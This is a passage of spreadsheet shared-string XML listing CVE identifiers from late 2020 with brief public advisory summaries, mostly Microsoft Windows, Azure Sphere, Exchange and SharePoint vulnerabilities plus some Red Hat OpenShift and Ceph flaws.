  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-16959</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-1696</t>
  </si>
  <si>
    <t>A flaw was found in the all pki-core 10.x.x versions, where Token Processing Service (TPS) where it did not properly sanitize Profile IDs, enabling a Stored Cross-Site Scripting (XSS) vulnerability when the profile ID is printed. An attacker with sufficient permissions could trick an authenticated victim into executing a specially crafted Javascript code.</t>
  </si>
  <si>
    <t>CVE-2020-16960</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-16961</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-16962</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16963, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-16963</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.</t>
  </si>
  <si>
    <t>CVE-2020-16964</t>
  </si>
  <si>
    <t>Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963.</t>
  </si>
  <si>
    <t>CVE-2020-16967</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16968.</t>
  </si>
  <si>
    <t>CVE-2020-16968</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16967.</t>
  </si>
  <si>
    <t>CVE-2020-16969</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka 'Microsoft Exchange Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1697</t>
  </si>
  <si>
    <t>It was found in all keycloak versions before 9.0.0 that links to external applications (Application Links) in the admin console are not validated properly and could allow Stored XSS attacks. An authed malicious user could create URLs to trick users in other realms, and possibly conduct further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-16970</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994.</t>
  </si>
  <si>
    <t>CVE-2020-16971</t>
  </si>
  <si>
    <t>Azure SDK for Java Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16972</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16973</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16974</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16975</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16976</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975.</t>
  </si>
  <si>
    <t>CVE-2020-16977</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16978</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16956.</t>
  </si>
  <si>
    <t>CVE-2020-16979</t>
  </si>
  <si>
    <t>Microsoft SharePoint Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17017.</t>
  </si>
  <si>
    <t>CVE-2020-1698</t>
  </si>
  <si>
    <t>A flaw was found in keycloak in versions before 9.0.0. A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-16980</t>
  </si>
  <si>
    <t>CVE-2020-16981</t>
  </si>
  <si>
    <t>Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16988, CVE-2020-16989, CVE-2020-16992, CVE-2020-16993.</t>
  </si>
  <si>
    <t>CVE-2020-16982</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994.</t>
  </si>
  <si>
    <t>CVE-2020-16983</t>
  </si>
  <si>
    <t>Azure Sphere Tampering Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16984</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994.</t>
  </si>
  <si>
    <t>CVE-2020-16985</t>
  </si>
  <si>
    <t>Azure Sphere Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16990.</t>
  </si>
  <si>
    <t>CVE-2020-16986</t>
  </si>
  <si>
    <t>Azure Sphere Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16987</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16991, CVE-2020-16994.</t>
  </si>
  <si>
    <t>CVE-2020-16988</t>
  </si>
  <si>
    <t>Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16989, CVE-2020-16992, CVE-2020-16993.</t>
  </si>
  <si>
    <t>CVE-2020-16989</t>
  </si>
  <si>
    <t>Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16992, CVE-2020-16993.</t>
  </si>
  <si>
    <t>CVE-2020-1699</t>
  </si>
  <si>
    <t>A path traversal flaw was found in the Ceph dashboard implemented in upstream versions v14.2.5, v14.2.6, v15.0.0 of Ceph storage and has been fixed in versions 14.2.7 and 15.1.0. An unauthenticated attacker could use this flaw to cause information disclosure on the host machine running the Ceph dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-16990</t>
  </si>
  <si>
    <t>Azure Sphere Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16985.</t>
  </si>
  <si>
    <t>CVE-2020-16991</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16994.</t>
  </si>
  <si>
    <t>CVE-2020-16992</t>
  </si>
  <si>
    <t>Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16989, CVE-2020-16993.</t>
  </si>
  <si>
    <t>CVE-2020-16993</t>
  </si>
  <si>
    <t>Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16989, CVE-2020-16992.</t>
  </si>
  <si>
    <t>CVE-2020-16994</t>
  </si>
  <si>
    <t>Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991.</t>
  </si>
  <si>
    <t>CVE-2020-16995</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka 'Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16996</t>
  </si>
  <si>
    <t>Kerberos Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16997</t>
  </si>
  <si>
    <t>Remote Desktop Protocol Server Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16998</t>
  </si>
  <si>
    <t>DirectX Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-16999</t>
  </si>
  <si>
    <t>Windows WalletService Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1700</t>
  </si>
  <si>
    <t>A flaw was found in the way the Ceph RGW Beast front-end handles unexpected disconnects. An authenticated attacker can abuse this flaw by making multiple disconnect attempts resulting in a permanent leak of a socket connection by radosgw. This flaw could lead to a denial of service condition by pile up of CLOSE_WAIT sockets, eventually leading to the exhaustion of available resources, preventing legitimate users from connecting to the system.</t>
  </si>
  <si>
    <t>CVE-2020-17000</t>
  </si>
  <si>
    <t>Remote Desktop Protocol Client Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17001</t>
  </si>
  <si>
    <t>Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17014.</t>
  </si>
  <si>
    <t>CVE-2020-17002</t>
  </si>
  <si>
    <t>Azure SDK for C Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17003</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka 'Base3D Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16918.</t>
  </si>
  <si>
    <t>CVE-2020-17004</t>
  </si>
  <si>
    <t>Windows Graphics Component Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17005</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17006, CVE-2020-17018, CVE-2020-17021.</t>
  </si>
  <si>
    <t>CVE-2020-17006</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17018, CVE-2020-17021.</t>
  </si>
  <si>
    <t>CVE-2020-17007</t>
  </si>
  <si>
    <t>Windows Error Reporting Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1701</t>
  </si>
  <si>
    <t>A flaw was found in the KubeVirt main virt-handler versions before 0.26.0 regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.</t>
  </si>
  <si>
    <t>CVE-2020-17010</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17038.</t>
  </si>
  <si>
    <t>CVE-2020-17011</t>
  </si>
  <si>
    <t>Windows Port Class Library Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17012</t>
  </si>
  <si>
    <t>Windows Bind Filter Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17013</t>
  </si>
  <si>
    <t>Win32k Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17014</t>
  </si>
  <si>
    <t>Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17001.</t>
  </si>
  <si>
    <t>CVE-2020-17015</t>
  </si>
  <si>
    <t>Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17016, CVE-2020-17060.</t>
  </si>
  <si>
    <t>CVE-2020-17016</t>
  </si>
  <si>
    <t>Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17015, CVE-2020-17060.</t>
  </si>
  <si>
    <t>CVE-2020-17017</t>
  </si>
  <si>
    <t>Microsoft SharePoint Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16979.</t>
  </si>
  <si>
    <t>CVE-2020-17018</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17006, CVE-2020-17021.</t>
  </si>
  <si>
    <t>CVE-2020-17019</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17064, CVE-2020-17065, CVE-2020-17066.</t>
  </si>
  <si>
    <t>CVE-2020-1702</t>
  </si>
  <si>
    <t>A malicious container image can consume an unbounded amount of memory when being pulled to a container runtime host, such as Red Hat Enterprise Linux using podman, or OpenShift Container Platform. An attacker can use this flaw to trick a user, with privileges to pull container images, into crashing the process responsible for pulling the image. This flaw affects containers-image versions before 5.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-17020</t>
  </si>
  <si>
    <t>Microsoft Word Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17021</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17006, CVE-2020-17018.</t>
  </si>
  <si>
    <t>CVE-2020-17022</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-17023</t>
  </si>
  <si>
    <t>CVE-2020-17024</t>
  </si>
  <si>
    <t>Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17025</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17026</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17027</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17028</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17029</t>
  </si>
  <si>
    <t>Windows Canonical Display Driver Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17030</t>
  </si>
  <si>
    <t>Windows MSCTF Server Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17031</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17032</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17033</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17034</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17043, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17035</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17036</t>
  </si>
  <si>
    <t>Windows Function Discovery SSDP Provider Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17037</t>
  </si>
  <si>
    <t>Windows WalletService Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17038</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17010.</t>
  </si>
  <si>
    <t>CVE-2020-1704</t>
  </si>
  <si>
    <t>An insecure modification vulnerability in the /etc/passwd file was found in all versions of OpenShift ServiceMesh (maistra) before 1.0.8 in the openshift/istio-kialia-rhel7-operator-container. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-17040</t>
  </si>
  <si>
    <t>Windows Hyper-V Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17041</t>
  </si>
  <si>
    <t>Windows Print Configuration Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17042</t>
  </si>
  <si>
    <t>Windows Print Spooler Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17043</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17044, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17044</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17055.</t>
  </si>
  <si>
    <t>CVE-2020-17045</t>
  </si>
  <si>
    <t>Windows KernelStream Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17046</t>
  </si>
  <si>
    <t>Windows Error Reporting Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17047</t>
  </si>
  <si>
    <t>Windows Network File System Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17048</t>
  </si>
  <si>
    <t>Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17054.</t>
  </si>
  <si>
    <t>CVE-2020-17049</t>
  </si>
  <si>
    <t>CVE-2020-1705</t>
  </si>
  <si>
    <t>A vulnerability was found in openshift/template-service-broker-operator in all 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/template-service-broker-operator. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-17051</t>
  </si>
  <si>
    <t>Windows Network File System Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17052</t>
  </si>
  <si>
    <t>Scripting Engine Memory Corruption Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17053</t>
  </si>
  <si>
    <t>Internet Explorer Memory Corruption Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17054</t>
  </si>
  <si>
    <t>Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17048.</t>
  </si>
  <si>
    <t>CVE-2020-17055</t>
  </si>
  <si>
    <t>Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025, CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034, CVE-2020-17043, CVE-2020-17044.</t>
  </si>
  <si>
    <t>CVE-2020-17056</t>
  </si>
  <si>
    <t>Windows Network File System Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17057</t>
  </si>
  <si>
    <t>Windows Win32k Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17058</t>
  </si>
  <si>
    <t>Microsoft Browser Memory Corruption Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1706</t>
  </si>
  <si>
    <t>It has been found that in openshift-enterprise version 3.11 and openshift-enterprise versions 4.1 up to, including 4.3, multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/apb-tools-container.</t>
  </si>
  <si>
    <t>CVE-2020-17060</t>
  </si>
  <si>
    <t>Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17015, CVE-2020-17016.</t>
  </si>
  <si>
    <t>CVE-2020-17061</t>
  </si>
  <si>
    <t>Microsoft SharePoint Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17062</t>
  </si>
  <si>
    <t>Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17063</t>
  </si>
  <si>
    <t>Microsoft Office Online Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17064</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17065, CVE-2020-17066.</t>
  </si>
  <si>
    <t>CVE-2020-17065</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17064, CVE-2020-17066.</t>
  </si>
  <si>
    <t>CVE-2020-17066</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17064, CVE-2020-17065.</t>
  </si>
  <si>
    <t>CVE-2020-17067</t>
  </si>
  <si>
    <t>Microsoft Excel Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17068</t>
  </si>
  <si>
    <t>Windows GDI+ Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17069</t>
  </si>
  <si>
    <t>Windows NDIS Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1707</t>
  </si>
  <si>
    <t>A vulnerability was found in all openshift/postgresql-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/postgresql-apb. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-17070</t>
  </si>
  <si>
    <t>Windows Update Medic Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17071</t>
  </si>
  <si>
    <t>Windows Delivery Optimization Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17073</t>
  </si>
  <si>
    <t>Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17074, CVE-2020-17076.</t>
  </si>
  <si>
    <t>CVE-2020-17074</t>
  </si>
  <si>
    <t>Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17073, CVE-2020-17076.</t>
  </si>
  <si>
    <t>CVE-2020-17075</t>
  </si>
  <si>
    <t>Windows USO Core Worker Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17076</t>
  </si>
  <si>
    <t>Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17073, CVE-2020-17074.</t>
  </si>
  <si>
    <t>CVE-2020-17077</t>
  </si>
  <si>
    <t>Windows Update Stack Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17078</t>
  </si>
  <si>
    <t>Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17079, CVE-2020-17082, CVE-2020-17086.</t>
  </si>
  <si>
    <t>CVE-2020-17079</t>
  </si>
  <si>
    <t>Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17082, CVE-2020-17086.</t>
  </si>
  <si>
    <t>CVE-2020-1708</t>
  </si>
  <si>
    <t>It has been found in openshift-enterprise version 3.11 and all openshift-enterprise versions from 4.1 to, including 4.3, that multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/mysql-apb.</t>
  </si>
  <si>
    <t>CVE-2020-17081</t>
  </si>
  <si>
    <t>Microsoft Raw Image Extension Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17082</t>
  </si>
  <si>
    <t>Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17079, CVE-2020-17086.</t>
  </si>
  <si>
    <t>CVE-2020-17083</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17084.</t>
  </si>
  <si>
    <t>CVE-2020-17084</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17083.</t>
  </si>
  <si>
    <t>CVE-2020-17085</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17086</t>
  </si>
  <si>
    <t>Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17079, CVE-2020-17082.</t>
  </si>
  <si>
    <t>CVE-2020-17087</t>
  </si>
  <si>
    <t>Windows Kernel Local Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17088</t>
  </si>
  <si>
    <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17089</t>
  </si>
  <si>
    <t>Microsoft SharePoint Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1709</t>
  </si>
  <si>
    <t>A vulnerability was found in all openshift/mediawiki 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/mediawiki. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-17090</t>
  </si>
  <si>
    <t>Microsoft Defender for Endpoint Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17091</t>
  </si>
  <si>
    <t>Microsoft Teams Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17092</t>
  </si>
  <si>
    <t>Windows Network Connections Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17094</t>
